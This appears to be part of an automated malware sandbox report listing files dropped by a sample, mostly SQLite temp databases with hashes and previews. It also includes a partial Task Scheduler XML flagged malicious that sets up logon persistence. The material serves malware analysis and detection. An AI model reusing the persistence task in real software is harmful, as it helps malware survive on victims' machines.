                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D01.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D02.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D12.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D13.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):40960
                    Entropy (8bit):0.8553638852307782
                    Encrypted:false
                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                    MD5:28222628A3465C5F0D4B28F70F97F482
                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D24.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D35.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D45.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D56.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D67.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9D77.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpBC1E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1578
                    Entropy (8bit):5.124571123551611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTnv
                    MD5:C38D80922C4EDF867B4A55EFC5AE78EE
                    SHA1:BD481B8C56FB90FAE34089F27BE27004D1034A72
                    SHA-256:1228956EB9C9097972026F901C0F552D8591AE6014426161D792E7AAB8B63F29
                    SHA-512:968D910D990128C95BF954FB324FC72B1732120E485B522015757C6F5DE3A30C13AF8387D17F6325A463FE54B99CFC809CF89FBCAD5EECADF0A845807CF08E98
                    Malicious:true
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                    C:\Users\user\AppData\Local\Temp\tmpC100.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC111.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC121.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC132.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpC162.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\VzwumYUBCtHW.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD5CE.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD5CF.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD5E0.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD5F0.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD5F1.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD602.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.1358696453229276
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD613.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD623.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                    MD5:349E6EB110E34A08924D92F6B334801D
                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                    Malicious:false
                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpD624.tmp

                    Download File
                    Process:C:\Users\user\Desktop\PzPxqbK89H.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                    Category:dropped
                    Size (bytes):49152
                    Entropy (8bit):0.8180424350137764
                    Encrypted:false
